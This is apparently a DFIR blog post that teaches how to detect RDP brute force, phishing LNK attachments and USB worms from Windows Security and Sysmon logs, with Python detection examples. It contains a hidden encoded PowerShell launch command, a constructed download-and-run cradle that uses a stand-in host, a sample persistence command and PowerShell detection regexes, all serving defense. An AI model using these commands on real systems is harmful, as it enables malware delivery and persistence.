Windows Threat Detection: A DFIR Guide to RDP, Phishing, and USB Attacks
- DFIRHive

- Oct 26

Introduction: Where Every Breach Begins
Every major incident — ransomware, data theft, or lateral compromise — begins with a single step: Initial Access.
Sometimes that step is obvious — an admin enabling RDP for convenience.
Other times, it’s subtle — a phishing attachment disguised as a PDF, or a USB drive left behind at reception.
And that’s what makes this stage so critical. Catching the attack here means stopping it before persistence, discovery, or encryption ever begin.
This guide expands on concepts from TryHackMe’s Windows Threat Detection lab and blends them with real-world case reporting, such as Mandiant’s M-Trends 2025, the BlackSuit ransomware write-ups, and the Raspberry Robin USB worm.
I found them invaluable for bridging practical log analysis with real-world adversary behavior — and this post expands on those ideas for analysts and defenders who want to understand why these detections matter.
Understanding Initial Access
Threat actors gain entry in two primary ways:
Exposed Services: RDP, SSH, HTTP, and similar services reachable from the internet (Case 1 below).
User Execution: phishing attachments and removable media, where the victim opens or runs a malicious file (Cases 2 and 3 below).
Threat groups like Medusa, BlackSuit, and Akira routinely use these same access vectors, proof that simple misconfigurations and human trust remain the most exploited “vulnerabilities.”
Case 1 — RDP: The “Ransomware Deployment Protocol”
RDP is one of the most common initial access methods observed in modern ransomware cases. In fact, defenders half-jokingly call it the “Ransomware Deployment Protocol.”
According to Censys Search, over 5 million RDP-enabled systems are exposed on the internet right now. Many are unprotected or use weak credentials, making them easy targets for automated brute-force attacks.
Scenario:
An IT admin enabled RDP on a production server to work from home on weekends.
Within hours, bots discovered the open port and began brute-forcing it. The entire compromise could be reconstructed from native Windows logs.
Step 1 — Detect the Brute Force
Event Source: Security Log
Event ID: 4625 (Failed logon attempts)
Filter for:
Repeated failed logons against the same host in a short window, often cycling through usernames
External IP addresses (IpAddress outside 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16; note that 4625 events for console or service logons carry “-” instead of an address)
Why: Dozens of failed 4625 events, from one IP or spread across many, are a hallmark of brute-force or credential-stuffing activity.
Caveat: With Network Level Authentication (NLA) enabled, failed RDP attempts are recorded with Logon Type 3, not 10, because the credential check happens before any interactive session exists. Filter on the source IP rather than on Logon Type 10 alone, or you will miss the brute force entirely.

Step 2 — Confirm the Breakthrough
Event ID: 4624 (Successful logon)
Logon Type: 10 (RemoteInteractive). With NLA you will usually see a Type 3 logon from the same IP a second or two earlier; both belong to the attacker.
Copy the Logon ID (TargetLogonId) from the Type 10 event. Sysmon ProcessCreate events carry a LogonId field, so this value links the authentication to every process started in that session.
This event marks when the attacker finally succeeded; record the IpAddress and WorkstationName as well, since they are useful for hunting the same actor across other hosts.

Step 3 — Trace Attacker Actions (Sysmon)
With the Logon ID, pivot to Sysmon logs.
Look for:
Sysmon 1 (ProcessCreate): whoami, ipconfig, net user, tasklist
Sysmon 3 (NetworkConnect): Outbound IPs or domains
Sysmon 11 (FileCreate): Tools downloaded or executed
Security 4698: Scheduled task creation (persistence); this event is only written when the “Audit Other Object Access Events” subcategory is enabled. Sysmon IDs 19/20/21 are WMI event filter, consumer and binding events, a different persistence mechanism, and do not record scheduled tasks; on the Sysmon side, a Sysmon 1 event for schtasks.exe is the signal to look for.
These are the same patterns observed in real Akira and BlackSuit ransomware intrusions: quick reconnaissance and tool staging within minutes of the initial RDP login.
Note: Pair Security 4624 (success) with Sysmon 1 (process creation). A command shell launched seconds after a remote logon from an external IP, by an account that does not normally log on remotely, is a strong signal. An administrator opening cmd.exe inside their own RDP session is not, so always weigh the source IP and the account’s history before calling it.
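Putting the three steps together, here is an added Python example (not code from the post or from the TryHackMe lab) that runs the 4625 burst check against non-RFC1918 sources, picks out the 4624 breakthrough from the same IP, and pivots on the Logon ID into Sysmon ProcessCreate events. The events are constructed samples: field names follow the real event XML, but the timestamps, hostnames, logon IDs, and the 203.0.113.0/24 and 198.51.100.0/24 addresses (documentation ranges) are fictional.

```python
# Added example (not from the original post or the TryHackMe lab): reconstruct
# an RDP brute-force intrusion from Security 4625/4624 and Sysmon 1 events.
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta


def _sec(eid, ts, user, ip, ltype, logon_id="-"):
    """Constructed Security event, shaped like the fields Get-WinEvent exposes."""
    return {"EventID": eid, "TimeCreated": ts, "TargetUserName": user,
            "IpAddress": ip, "LogonType": ltype, "TargetLogonId": logon_id}


SECURITY = (
    # eight failures in eight seconds from one internet address, cycling users;
    # Logon Type 3 because NLA rejects the credential before a session exists
    [_sec(4625, f"2025-10-04T02:10:{s:02d}", u, "203.0.113.7", 3)
     for s, u in enumerate(["administrator", "admin", "backup", "sqlsvc",
                            "jdoe", "administrator", "administrator", "root"])]
    # noise: two slow failures from another external IP, an internal typo,
    # and a local failure that carries no source address at all
    + [_sec(4625, "2025-10-04T02:12:00", "admin", "198.51.100.9", 3),
       _sec(4625, "2025-10-04T02:40:00", "admin", "198.51.100.9", 3),
       _sec(4625, "2025-10-04T01:05:00", "jdoe", "10.0.0.5", 10),
       _sec(4625, "2025-10-04T01:06:00", "svc_backup", "-", 2),
       # legitimate admin session earlier in the night
       _sec(4624, "2025-10-04T01:00:00", "jdoe", "10.0.0.5", 10, "0x1A2B"),
       # the breakthrough: with NLA a Type 3 logon precedes the Type 10 session
       _sec(4624, "2025-10-04T02:31:00", "administrator", "203.0.113.7", 3, "0x3E7A12"),
       _sec(4624, "2025-10-04T02:31:01", "administrator", "203.0.113.7", 10, "0x3E7B40")]
)


def _sys(ts, image, cmdline, parent, logon_id):
    """Constructed Sysmon ProcessCreate (Event ID 1); Sysmon writes LogonId in lowercase hex."""
    return {"EventID": 1, "TimeCreated": ts, "Image": image, "CommandLine": cmdline,
            "ParentImage": parent, "LogonId": logon_id}


SYSMON = [
    _sys("2025-10-04T01:01:10", r"C:\Windows\System32\notepad.exe", "notepad.exe",
         r"C:\Windows\explorer.exe", "0x1a2b"),
    _sys("2025-10-04T02:31:40", r"C:\Windows\System32\cmd.exe", "cmd.exe",
         r"C:\Windows\explorer.exe", "0x3e7b40"),
    _sys("2025-10-04T02:31:52", r"C:\Windows\System32\whoami.exe", "whoami /all",
         r"C:\Windows\System32\cmd.exe", "0x3e7b40"),
    _sys("2025-10-04T02:32:05", r"C:\Windows\System32\net.exe", "net user",
         r"C:\Windows\System32\cmd.exe", "0x3e7b40"),
    _sys("2025-10-04T02:35:30", r"C:\Windows\System32\schtasks.exe",
         r"schtasks /create /tn Updater /tr C:\Users\Public\up.exe /sc onlogon",
         r"C:\Windows\System32\cmd.exe", "0x3e7b40"),
]

# Checked explicitly: ipaddress.is_private also covers the TEST-NET documentation
# ranges used in these samples, which would wrongly mark the attacker as internal.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
RECON = {"whoami.exe", "ipconfig.exe", "net.exe", "net1.exe", "tasklist.exe"}
PERSIST = {"schtasks.exe", "reg.exe", "sc.exe"}


def is_external(ip_str):
    """True for a routable non-RFC1918 address; '-' (no source) is never external."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False
    if ip.is_loopback or ip.is_link_local:
        return False
    return not any(ip in net for net in RFC1918)


def find_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """External IPs with `threshold` or more 4625s inside any `window`; value is the total count."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and is_external(e["IpAddress"]):
            by_ip[e["IpAddress"]].append(datetime.fromisoformat(e["TimeCreated"]))
    hits = {}
    for ip, times in by_ip.items():
        times.sort()
        for i in range(len(times) - threshold + 1):      # sliding window over sorted times
            if times[i + threshold - 1] - times[i] <= window:
                hits[ip] = len(times)
                break
    return hits


def find_breakthrough(events, attacker_ips):
    """4624 events (RDP Type 10, or the Type 3 NLA pre-auth) from a brute-forcing IP, oldest first."""
    hits = [e for e in events if e["EventID"] == 4624 and e["LogonType"] in (3, 10)
            and e["IpAddress"] in attacker_ips]
    return sorted(hits, key=lambda e: e["TimeCreated"])


def session_commands(sysmon, logon_id):
    """Every ProcessCreate in one logon session. Security writes 0x3E7B40 and Sysmon
    0x3e7b40, so compare the IDs numerically rather than as strings."""
    wanted = int(logon_id, 16)
    return [e["CommandLine"] for e in sorted(sysmon, key=lambda e: e["TimeCreated"])
            if e["EventID"] == 1 and int(e["LogonId"], 16) == wanted]


def classify(commands):
    """Bucket command lines by executable name (first token, path and quotes stripped)."""
    buckets = {"recon": [], "persistence": [], "other": []}
    for c in commands:
        exe = c.split()[0].strip('"').rsplit("\\", 1)[-1].lower()
        if not exe.endswith(".exe"):
            exe += ".exe"
        key = "recon" if exe in RECON else "persistence" if exe in PERSIST else "other"
        buckets[key].append(c)
    return buckets


if __name__ == "__main__":
    attackers = find_bruteforce(SECURITY)
    print("brute-force sources:", attackers)
    for e in find_breakthrough(SECURITY, attackers):
        print(f"{e['TimeCreated']} 4624 type {e['LogonType']} {e['TargetUserName']} "
              f"from {e['IpAddress']} LogonId={e['TargetLogonId']}")
    session = [e for e in find_breakthrough(SECURITY, attackers) if e["LogonType"] == 10][0]
    print(classify(session_commands(SYSMON, session["TargetLogonId"])))
```

On a real case the dicts come from Get-WinEvent or an EVTX parser rather than being typed in; the two things worth carrying over are the sliding-window count (a burst, not just a total) and the numeric Logon ID comparison, which silently fails if done as a string match across the two logs.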
Evidence Collection
Export Security.evtx for the 4625 → 4624 window.
Export corresponding Sysmon EVTX.
Hash and preserve dropped binaries.
Note timestamps for correlation.
MITRE Techniques: T1133 (External Remote Services), T1110 (Brute Force), T1021.001 (Remote Services: Remote Desktop Protocol), T1053.005 (Scheduled Task/Job: Scheduled Task, for the persistence step)

Case 2 — Phishing Attachments: When Curiosity Opens the Door
Phishing remains one of the most resilient intrusion techniques. According to HoxHunt’s 2025 report, phishing incidents have surged 41× since 2022, largely due to automation and AI-generated lures.
Scenario:
The victim receives an email titled “Invoice 2025” with an attachment:
Invoice.pdf.lnk
Windows never displays the .lnk extension (the shortcut file type is registered with NeverShowExt), so the file shows up as “Invoice.pdf” even when “Hide extensions for known file types” is turned off. When opened, the shortcut silently executes PowerShell:
powershell -nop -w hidden -enc <Base64Payload>
The -enc argument is Base64 of UTF-16LE text, so a plain Base64 decode yields a string with a NUL byte after every character; decode it as UTF-16LE to recover the script. Decoded, the command downloads and executes Remcos RAT, a well-known remote-access Trojan.
Step 1 — Identify File Creation (Sysmon 11)
Look for .lnk or .zip files created in the user’s Downloads\ directory, or under Outlook’s Content.Outlook cache folder if the attachment was opened straight from the mail client.
Why: Shows the arrival of the phishing artifact. If Sysmon 15 (FileCreateStreamHash) is enabled, the Zone.Identifier stream written alongside a downloaded file records the Mark-of-the-Web zone and, with current browsers, the source URL.
Step 2 — Detect Execution Chain (Sysmon 1)
Check for:
ParentImage: explorer.exe (the user double-clicked the file)
Image: powershell.exe
CommandLine: -enc, -nop, -w hidden (also watch for -ep bypass and -noni)
An explorer.exe → powershell.exe chain on its own is not malicious; users open shells from the Start menu all the time. It is the combination with an encoded command, a hidden window and no-profile flags, launched moments after a .lnk landed in Downloads, that marks malicious LNK activity.
Step 3 — Follow the Network & Dropper Activity
Sysmon 3: PowerShell making external connections (Sysmon 22, DNSQuery, records the domain it resolved first).
Sysmon 11: File creation like C:\Users\Public\invoice_update.exe.
Sysmon 1: New process creation for that executable.
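The three steps above, as an added Python example (not code from the post or from any project it cites): it decodes the -enc argument as UTF-16LE, scores the PowerShell ProcessCreate against the parent and the flags listed in Step 2, and walks ParentProcessGuid from that process to reach the dropper’s file write and outbound connections. All events, GUIDs, paths and the example.invalid URL are constructed samples, and the “cradle” string is a stand-in for the real Remcos loader, not a copy of it.

```python
# Added example (not from the original post): decode a PowerShell -enc payload
# and walk the explorer -> powershell -> dropper chain in Sysmon telemetry.
import base64
import re
from collections import deque

# Constructed stand-in for the attacker's script (the real one fetched Remcos).
CRADLE = ("Invoke-WebRequest http://example.invalid/up -OutFile "
          r"C:\Users\Public\invoice_update.exe; Start-Process C:\Users\Public\invoice_update.exe")
# -EncodedCommand takes Base64 of UTF-16LE text; build the sample the same way.
ENC = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYSMON = [  # constructed events; GUIDs are placeholders, not real Sysmon GUIDs
    {"EventID": 11, "TimeCreated": "2025-10-06T09:02:11", "ProcessGuid": "{G-OUTLOOK}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\jdoe\Downloads\Invoice.pdf.lnk"},
    {"EventID": 1, "TimeCreated": "2025-10-06T09:02:40", "ProcessGuid": "{G-PS}",
     "ParentProcessGuid": "{G-EXPLORER}", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {ENC}"},
    {"EventID": 3, "TimeCreated": "2025-10-06T09:02:41", "ProcessGuid": "{G-PS}",
     "DestinationIp": "198.51.100.23", "DestinationPort": 80},
    {"EventID": 11, "TimeCreated": "2025-10-06T09:02:43", "ProcessGuid": "{G-PS}",
     "Image": PS, "TargetFilename": r"C:\Users\Public\invoice_update.exe"},
    {"EventID": 1, "TimeCreated": "2025-10-06T09:02:44", "ProcessGuid": "{G-RAT}",
     "ParentProcessGuid": "{G-PS}", "Image": r"C:\Users\Public\invoice_update.exe",
     "ParentImage": PS, "CommandLine": r"C:\Users\Public\invoice_update.exe"},
    {"EventID": 3, "TimeCreated": "2025-10-06T09:02:50", "ProcessGuid": "{G-RAT}",
     "DestinationIp": "198.51.100.23", "DestinationPort": 2404},
    # benign noise: an admin opening a shell from the Start menu
    {"EventID": 1, "TimeCreated": "2025-10-06T09:30:00", "ProcessGuid": "{G-PS2}",
     "ParentProcessGuid": "{G-EXPLORER}", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{PS}"'},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen (assumption: not an exhaustive list).
_ENC_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
FLAGS = {
    "encoded command": re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s", re.I),
    "hidden window": re.compile(r"[-/]w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"[-/]nop(?:rofile)?\b", re.I),
    "non-interactive": re.compile(r"[-/]noni(?:nteractive)?\b", re.I),
    "execution policy bypass": re.compile(r"[-/]e(?:p|xecutionpolicy)\s+bypass", re.I),
}


def decode_encoded_command(cmdline):
    """Recover the script behind -enc, or None when the command line has no encoded block."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate stripped padding
    return raw.decode("utf-16-le")


def score_powershell(ev):
    """Indicators for one ProcessCreate event; an empty list means nothing notable."""
    if not ev["Image"].lower().endswith("powershell.exe"):
        return []
    found = []
    if ev["ParentImage"].lower().endswith("\\explorer.exe"):
        found.append("spawned by explorer.exe")
    found += [name for name, rx in FLAGS.items() if rx.search(ev["CommandLine"])]
    return found


def is_suspicious(ev):
    """Parent alone is weak evidence; require the parent plus at least two flags."""
    return len(score_powershell(ev)) >= 3


def follow_chain(events, root_guid):
    """Breadth-first walk over ParentProcessGuid, collecting what the whole tree did."""
    guids, queue = {root_guid}, deque([root_guid])
    while queue:
        g = queue.popleft()
        for e in events:
            if e["EventID"] == 1 and e.get("ParentProcessGuid") == g and e["ProcessGuid"] not in guids:
                guids.add(e["ProcessGuid"])
                queue.append(e["ProcessGuid"])
    return {
        "processes": [e["Image"] for e in events if e["EventID"] == 1 and e["ProcessGuid"] in guids],
        "files": [e["TargetFilename"] for e in events if e["EventID"] == 11 and e["ProcessGuid"] in guids],
        "network": sorted({(e["DestinationIp"], e["DestinationPort"])
                           for e in events if e["EventID"] == 3 and e["ProcessGuid"] in guids}),
    }


if __name__ == "__main__":
    for ev in (e for e in SYSMON if e["EventID"] == 1 and is_suspicious(e)):
        print("suspicious:", score_powershell(ev))
        print("decoded   :", decode_encoded_command(ev["CommandLine"]))
        print("chain     :", follow_chain(SYSMON, ev["ProcessGuid"]))
```

The chain walk uses ProcessGuid rather than PID on purpose: PIDs are reused within minutes on a busy host, while Sysmon’s GUID is unique per process instance, so it is the only safe key for parent/child joins across a long log.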
Evidence Collection
Save the .lnk and the decoded PowerShell payload.
Extract the downloaded binary for analysis.
Pull related proxy/DNS entries for exfiltration domains.
MITRE Techniques: T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1059.001 (Command and Scripting Interpreter: PowerShell), T1105 (Ingress Tool Transfer)

Case 3 — Infected USBs: Old Tricks Still Work
Not every breach starts online. Attacks like Camaro Dragon and Raspberry Robin spread via infected USB drives — exploiting curiosity and convenience.
These worms often:
Hide the real files and replace them with malicious .lnk shortcuts that carry the same names and icons.
Use double extensions (photo.jpg.exe).
Execute payloads that establish persistence or C2 connections.
Scenario:
A USB labeled “HR Bonus Documents” is inserted into a workstation. The user double-clicks what looks like a PDF; it is actually bonus.pdf.exe, with the final extension hidden by the default “Hide extensions for known file types” setting.
Detection Steps
Device insertion: Microsoft-Windows-Partition/Diagnostic event 1006 (or Security 6416 when “Audit PNP Activity” is enabled) records the device and its serial number, giving you the insertion time that anchors the timeline.
Sysmon 1: Execution from E:\ or F:\ (any letter other than the system drive; confirm which letter the device received rather than assuming), typically with ParentImage explorer.exe.
Sysmon 11: Copy of the same file into C:\Users\Public\ or C:\Windows\Temp\.
Sysmon 3: Outbound network traffic following execution.


Evidence Collection
Forensic copy of the USB contents.
Sysmon log slices around the insertion time.
Host copy of the payload (hash + quarantine).
MITRE Techniques: T1091 (Replication Through Removable Media), T1204.002 (User Execution: Malicious File), T1105 (Ingress Tool Transfer)
Why These Detections Matter
Every one of these techniques — RDP, phishing, removable media — leaves evidence in plain sight. The difference between a compromise and a contained incident often comes down to whether someone notices:
A burst of 4625s followed by one 4624.
An explorer.exe → powershell.exe chain.
A process spawning from E:\.
Learning to connect those dots transforms raw logs into a timeline of intent.
Takeaways
| Investigation Focus | Event Source | Event IDs | Purpose |
|---|---|---|---|
| Brute-force login | Security | 4625 / 4624 (Type 10; Type 3 with NLA) | Identify exposed RDP login attempts and the one that succeeded |
| Command execution | Sysmon | 1 | Show attacker activity post-login (pivot on LogonId) |
| File creation | Sysmon | 11 | Detect dropped or staged payloads |
| Network connect | Sysmon | 3 | Reveal C2 or payload download |
| Persistence tasks | Security | 4698 | Scheduled task creation (needs Audit Other Object Access Events) |
| WMI persistence | Sysmon | 19 / 20 / 21 | WMI event filter, consumer and binding creation |
Quick reading list (references)
MITRE ATT&CK Framework – attack.mitre.org
CISA Advisories – cisa.gov
The DFIR Report – BlackSuit Ransomware; Unit 42 – BlackSuit Threat Assessment
HoxHunt Phishing Trends 2025 – hoxhunt.com
Check Point – Camaro Dragon – research.checkpoint.com
Red Canary – Raspberry Robin – redcanary.com
Microsoft – Raspberry Robin Worm – microsoft.com
Mandiant M-Trends 2025 Report (PDF) – services.google.com/fh/files/misc/m-trends-2025-en.pdf
This post draws on the TryHackMe “Windows Threat Detection” labs to connect practical telemetry with adversary behavior. In future parts, we’ll expand into persistence, privilege escalation, and lateral movement — continuing the journey from initial access to full incident response.